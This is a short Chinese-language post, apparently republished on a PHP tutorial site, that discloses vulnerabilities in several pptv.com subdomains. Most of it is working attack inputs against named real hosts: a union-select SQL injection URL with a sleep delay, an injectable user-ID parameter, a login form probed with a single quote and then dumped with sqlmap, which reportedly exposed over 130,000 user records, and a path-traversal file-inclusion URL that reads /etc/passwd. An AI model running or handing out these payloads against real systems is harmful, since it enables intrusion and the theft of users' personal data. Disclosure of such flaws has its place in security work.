来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 1.http://d.pptv.com/phonelist.php?do=onejx=11 union select 1,2,3,4 and sleep(5)#sj=yqid=02.注入点:http://cp.pptv.com/ssc/t.jsp?userId=16128627lotteryId=300注入参数:userid3.http://gm.ppt......
|
1.http://d.pptv.com/phonelist.php?do=one&jx=11 union select 1,2,3,4 and sleep(5)#&sj=&yqid=0 2.注入点:http://cp.pptv.com/ssc/t.jsp?userId=16128627&lotteryId=300 注入参数:userid  3.http://gm.pptv.com/k2x/page/login/login.php  在通行证输入框输入单引号,查看返回的数据包可见存在sql注入:
 拿Sqlmap跑吧.....哇额,k2game.user表里面有13w+用户资料:
 ·····
4.任意文件包含;
http://d.pptv.com/game_class.php?mid=4&sj=828&yqid=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
